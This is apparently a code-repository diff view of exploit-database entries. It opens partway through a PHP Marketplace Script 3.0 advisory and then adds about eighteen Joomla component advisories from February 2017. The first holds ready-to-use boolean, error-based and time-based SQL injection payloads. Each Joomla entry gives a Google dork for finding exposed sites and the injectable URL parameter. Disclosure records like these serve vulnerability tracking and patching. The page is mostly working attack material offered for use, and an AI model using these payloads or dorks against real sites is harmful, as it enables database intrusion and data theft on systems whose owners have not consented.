# Exploit Title : PHP Marketplace Script - Multiple SQL Injection Vulnerabilities
|
||||
# Author : Yunus YILDIRIM (Th3GundY)
|
||||
# Team : CT-Zer0 (@CRYPTTECH) - https://www.crypttech.com
|
||||
# Website : http://www.yunus.ninja
|
||||
# Contact : yunusyildirim@protonmail.com
|
||||
|
||||
# Vendor Homepage : http://www.ecommercemix.com/
|
||||
# Software Link : http://ecommercemix.com/php-marketplace-script/
|
||||
# Vuln. Version : 3.0
|
||||
# Demo : http://pleasureriver.com
|
||||
|
||||
|
||||
# # # # DETAILS # # # #
|
||||
|
||||
SQL Injections :
|
||||
|
||||
# 1
|
||||
http://localhost/shopby/all?q=gundy
|
||||
Parameter: q (GET)
|
||||
Type: boolean-based blind
|
||||
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
|
||||
Payload: q=LIEQ") OR NOT 5305=5305#
|
||||
|
||||
Type: error-based
|
||||
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
|
||||
Payload: q=LIEQ") AND (SELECT 7200 FROM(SELECT COUNT(*),CONCAT(0x7170767871,(SELECT (ELT(7200=7200,1))),0x7176766271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ("SRxl"="SRxl
|
||||
|
||||
Type: AND/OR time-based blind
|
||||
Title: MySQL >= 5.0.12 OR time-based blind (comment)
|
||||
Payload: q=LIEQ") OR SLEEP(5)#
|
||||
|
||||
# 2
|
||||
http://localhost/shopby/all?p=31
|
||||
Parameter: p (GET)
|
||||
Type: boolean-based blind
|
||||
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
|
||||
Payload: p=31") OR NOT 6681=6681#
|
||||
|
||||
Type: error-based
|
||||
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
|
||||
Payload: p=31") AND (SELECT 4760 FROM(SELECT COUNT(*),CONCAT(0x7170767871,(SELECT (ELT(4760=4760,1))),0x7176766271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ("eFds"="eFds
|
||||
|
||||
Type: AND/OR time-based blind
|
||||
Title: MySQL >= 5.0.12 AND time-based blind
|
||||
Payload: p=31") AND SLEEP(5) AND ("kxQU"="kxQU
|
||||
|
||||
# 3
|
||||
http://localhost/shopby/all?c=Turkey
|
||||
Parameter: c (GET)
|
||||
Type: boolean-based blind
|
||||
Title: AND boolean-based blind - WHERE or HAVING clause
|
||||
Payload: c=Turkey' AND 9145=9145 AND 'tvKB'='tvKB
|
||||
|
||||
Type: error-based
|
||||
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
|
||||
Payload: c=Turkey' AND (SELECT 5928 FROM(SELECT COUNT(*),CONCAT(0x7176767071,(SELECT (ELT(5928=5928,1))),0x717a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'APFD'='APFD
|
||||
|
||||
Type: AND/OR time-based blind
|
||||
Title: MySQL >= 5.0.12 AND time-based blind
|
||||
Payload: c=Turkey' AND SLEEP(5) AND 'rmia'='rmia
|
||||
17
platforms/php/webapps/41330.txt
Executable file
17
platforms/php/webapps/41330.txt
Executable file
|
|
@ -0,0 +1,17 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component JE Classify Ads 1.2 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_jeclassifyads
|
||||
# Date: 13.02.2017
|
||||
# Vendor Homepage: http://www.joomlaextension.biz/
|
||||
# Software Buy: https://extensions.joomla.org/extensions/extension/ads-a-affiliates/classified-ads/je-classify-ads/
|
||||
# Demo: http://www.joomlaextension.biz/demo/
|
||||
# Version: 1.2
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_jeclassifyads&view=item_detail&pro_id=[SQL]
|
||||
# # # # #
|
||||
17
platforms/php/webapps/41331.txt
Executable file
17
platforms/php/webapps/41331.txt
Executable file
|
|
@ -0,0 +1,17 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component JE Gallery v1.3 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_jegallery
|
||||
# Date: 13.02.2017
|
||||
# Vendor Homepage: http://www.joomlaextension.biz/
|
||||
# Software Buy: https://extensions.joomla.org/extensions/extension/photos-a-images/galleries/je-gallery/
|
||||
# Demo: http://www.joomlaextension.biz/demo/
|
||||
# Version: 1.3
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_jegallery&view=photo_detail&photo_id=[SQL]
|
||||
# # # # #
|
||||
17
platforms/php/webapps/41332.txt
Executable file
17
platforms/php/webapps/41332.txt
Executable file
|
|
@ -0,0 +1,17 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component JE Directory Ads 1.7 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_jedirectory
|
||||
# Date: 13.02.2017
|
||||
# Vendor Homepage: http://www.joomlaextension.biz/
|
||||
# Software Buy: https://extensions.joomla.org/extensions/extension/directory-a-documentation/directory/je-directory/
|
||||
# Demo: http://www.joomlaextension.biz/demo/
|
||||
# Version: 1.7
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_jedirectory&view=item_detail&ditemid=[SQL]
|
||||
# # # # #
|
||||
17
platforms/php/webapps/41333.txt
Executable file
17
platforms/php/webapps/41333.txt
Executable file
|
|
@ -0,0 +1,17 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component JE QuoteForm - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_jequoteform
|
||||
# Date: 13.02.2017
|
||||
# Vendor Homepage: http://www.joomlaextension.biz/
|
||||
# Software Buy: http://www.joomlaextension.biz/demo/index.php?option=com_jequoteform
|
||||
# Demo: http://www.joomlaextension.biz/demo/
|
||||
# Version: N/A
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_jequoteform&view=form&Itemid=[SQL]
|
||||
# # # # #
|
||||
18
platforms/php/webapps/41334.txt
Executable file
18
platforms/php/webapps/41334.txt
Executable file
|
|
@ -0,0 +1,18 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component JE Property Finder 1.6.3 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_jepropertyfinder
|
||||
# Date: 13.02.2017
|
||||
# Vendor Homepage: http://www.joomlaextension.biz/
|
||||
# Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/real-estate/je-property-finder/
|
||||
# Demo: http://www.joomlaextension.biz/demo/
|
||||
# Version: 1.6.3
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_jepropertyfinder&view=section_detail&sf_id=[SQL]
|
||||
# http://localhost/[PATH]/index.php?option=com_jepropertyfinder&view=userprofile&userId=[SQL]
|
||||
# # # # #
|
||||
18
platforms/php/webapps/41335.txt
Executable file
18
platforms/php/webapps/41335.txt
Executable file
|
|
@ -0,0 +1,18 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component JE Tour 2.0 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_jetour
|
||||
# Date: 13.02.2017
|
||||
# Vendor Homepage: http://www.joomlaextension.biz/
|
||||
# Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/booking-a-reservations/je-tour/
|
||||
# Demo: http://www.joomlaextension.biz/demo/
|
||||
# Version: 2.0
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_jetour&view=package_detail&pid=[SQL]
|
||||
# http://localhost/[PATH]/index.php?option=com_jetour&view=package&cid=[SQL]
|
||||
# # # # #
|
||||
18
platforms/php/webapps/41336.txt
Executable file
18
platforms/php/webapps/41336.txt
Executable file
|
|
@ -0,0 +1,18 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component JE Video Rate 1.0 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_jevideorate
|
||||
# Date: 13.02.2017
|
||||
# Vendor Homepage: http://www.joomlaextension.biz/
|
||||
# Software Buy: https://extensions.joomla.org/extensions/extension/multimedia/multimedia-players/je-video-rate/
|
||||
# Demo: http://www.joomlaextension.biz/demo/
|
||||
# Version: 1.0
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_jevideorate&view=video&cat_id=[SQL]
|
||||
# http://localhost/[PATH]/index.php?option=com_jevideorate&view=video_detail&id=[SQL]
|
||||
# # # # #
|
||||
17
platforms/php/webapps/41337.txt
Executable file
17
platforms/php/webapps/41337.txt
Executable file
|
|
@ -0,0 +1,17 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component JE auction 1.6 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_jeauction
|
||||
# Date: 13.02.2017
|
||||
# Vendor Homepage: http://www.joomlaextension.biz/
|
||||
# Software Buy: https://extensions.joomla.org/extensions/extension/e-commerce/auction/je-auction/
|
||||
# Demo: http://www.joomlaextension.biz/demo/
|
||||
# Version: 1.6
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_jeauction&view=event_detail&eid=[SQL]
|
||||
# # # # #
|
||||
17
platforms/php/webapps/41338.txt
Executable file
17
platforms/php/webapps/41338.txt
Executable file
|
|
@ -0,0 +1,17 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component JE Auto 1.5 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_jeauto
|
||||
# Date: 13.02.2017
|
||||
# Vendor Homepage: http://www.joomlaextension.biz/
|
||||
# Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/vehicles/je-auto/
|
||||
# Demo: http://www.joomlaextension.biz/demo/
|
||||
# Version: 1.5
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_jeauto&view=item_detail&d_itemid=[SQL]
|
||||
# # # # #
|
||||
18
platforms/php/webapps/41339.txt
Executable file
18
platforms/php/webapps/41339.txt
Executable file
|
|
@ -0,0 +1,18 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component JE Awd Song 1.8 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_jeawdsong
|
||||
# Date: 13.02.2017
|
||||
# Vendor Homepage: http://www.joomlaextension.biz/
|
||||
# Software Buy: https://extensions.joomla.org/extensions/extension/multimedia/multimedia-players/je-awd-song/
|
||||
# Demo: http://www.joomlaextension.biz/demo/
|
||||
# Version: 1.8
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_jeawdsong&view=song_detail&id=[SQL]
|
||||
# http://localhost/[PATH]/index.php?option=com_jeawdsong&view=song_detail&id=1&contest_id=[SQL]
|
||||
# # # # #
|
||||
17
platforms/php/webapps/41340.txt
Executable file
17
platforms/php/webapps/41340.txt
Executable file
|
|
@ -0,0 +1,17 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component Hbooking 1.9.9 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_hbooking
|
||||
# Date: 13.02.2017
|
||||
# Vendor Homepage: http://www.joomlaextension.biz/
|
||||
# Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/booking-a-reservations/hbooking/
|
||||
# Demo: http://www.joomlaextension.biz/demo/
|
||||
# Version: 1.9.9
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_hbooking&view=roomlisting&temp=hotel&h_id=[SQL]
|
||||
# # # # #
|
||||
18
platforms/php/webapps/41341.txt
Executable file
18
platforms/php/webapps/41341.txt
Executable file
|
|
@ -0,0 +1,18 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component JE Quiz 2.3 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_jequizmanagement
|
||||
# Date: 13.02.2017
|
||||
# Vendor Homepage: http://www.joomlaextension.biz/
|
||||
# Software Buy: https://extensions.joomla.org/extensions/extension/living/education-a-culture/je-quiz-component/
|
||||
# Demo: http://www.joomlaextension.biz/demo/
|
||||
# Version: 2.3
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_jequizmanagement&view=question&eid=[SQL]
|
||||
# http://localhost/[PATH]/index.php?option=com_jequizmanagement&view=question_detail&Itemid=[SQL]
|
||||
# # # # #
|
||||
17
platforms/php/webapps/41342.txt
Executable file
17
platforms/php/webapps/41342.txt
Executable file
|
|
@ -0,0 +1,17 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component JE Grid Folio - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_jegridfolio
|
||||
# Date: 13.02.2017
|
||||
# Vendor Homepage: http://www.joomlaextension.biz/
|
||||
# Software Buy: http://www.joomlaextension.biz/demo/index.php?option=com_jegridfolio
|
||||
# Demo: http://www.joomlaextension.biz/demo/
|
||||
# Version: N/A
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_jegridfolio&view=category_detail&id=[SQL]
|
||||
# # # # #
|
||||
17
platforms/php/webapps/41343.txt
Executable file
17
platforms/php/webapps/41343.txt
Executable file
|
|
@ -0,0 +1,17 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component JE K2 Multiple Form Story v1.3 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_jek2storymultipleform
|
||||
# Date: 13.02.2017
|
||||
# Vendor Homepage: http://www.joomlaextension.biz/
|
||||
# Software Buy: http://www.joomlaextensions.co.in/index.php?option=com_jeshop&view=category_detail&id=76&Itemid=112
|
||||
# Demo: http://www.joomlaextension.biz/demo/
|
||||
# Version: N/A
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_jek2storymultipleform&view=jesubmit&Itemid=[SQL]
|
||||
# # # # #
|
||||
17
platforms/php/webapps/41344.txt
Executable file
17
platforms/php/webapps/41344.txt
Executable file
|
|
@ -0,0 +1,17 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component JE Form Creator v1.8 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_jeformcr
|
||||
# Date: 13.02.2017
|
||||
# Vendor Homepage: http://www.joomlaextension.biz/
|
||||
# Software Buy: https://extensions.joomla.org/extensions/extension/contacts-and-feedback/forms/je-form-creator/
|
||||
# Demo: http://www.joomlaextension.biz/demo/
|
||||
# Version: 1.8
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_jeformcr&view=form&Itemid=[SQL]
|
||||
# # # # #
|
||||
17
platforms/php/webapps/41345.txt
Executable file
17
platforms/php/webapps/41345.txt
Executable file
|
|
@ -0,0 +1,17 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component JE Portfolio Creator v1.2 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_jeportfolio
|
||||
# Date: 13.02.2017
|
||||
# Vendor Homepage: http://www.joomlaextension.biz/
|
||||
# Software Buy: https://extensions.joomla.org/extensions/extension/directory-a-documentation/portfolio/je-portfolio/
|
||||
# Demo: http://www.joomlaextension.biz/demo/
|
||||
# Version: 1.2
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_jeportfolio&view=item_detail&d_itemid=[SQL]
|
||||
# # # # #
|
||||
17
platforms/php/webapps/41346.txt
Executable file
17
platforms/php/webapps/41346.txt
Executable file
|
|
@ -0,0 +1,17 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component JE Ticket System v1.2 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_jeticket
|
||||
# Date: 13.02.2017
|
||||
# Vendor Homepage: http://www.joomlaextension.biz/
|
||||
# Software Buy: https://extensions.joomla.org/extensions/extension/clients-a-communities/help-desk/je-ticket-system/
|
||||
# Demo: http://www.joomlaextension.biz/demo/
|
||||
# Version: 1.2
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_jeticket&view=assign_detail&cid[0]=[SQL]
|
||||
# # # # #
|
||||
19
platforms/php/webapps/41347.txt
Executable file
19
platforms/php/webapps/41347.txt
Executable file
|
|
@ -0,0 +1,19 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component JE Messanger - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_jemessenger
|
||||
# Date: 13.02.2017
|
||||
# Vendor Homepage: http://www.joomlaextension.biz/
|
||||
# Software Buy: http://www.joomlaextension.biz/demo/index.php?option=com_jemessenger
|
||||
# Demo: http://www.joomlaextension.biz/demo/
|
||||
# Version: N/A
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_jemessenger&view=box_detail&folder=Inbox&task=edit&Itemid=1496&cid[0]=[SQL]
|
||||
# http://localhost/[PATH]/index.php?option=com_jemessenger&view=box_detail&folder=Outbox&task=edit&Itemid=1496&cid[0]=[SQL]
|
||||
# http://localhost/[PATH]/index.php?option=com_jemessenger&view=box_detail&folder=Trash&task=edit&Itemid=1496&cid[0]=[SQL]
|
||||
# # # # #
|
||||
Loading…
Add table
Reference in a new issue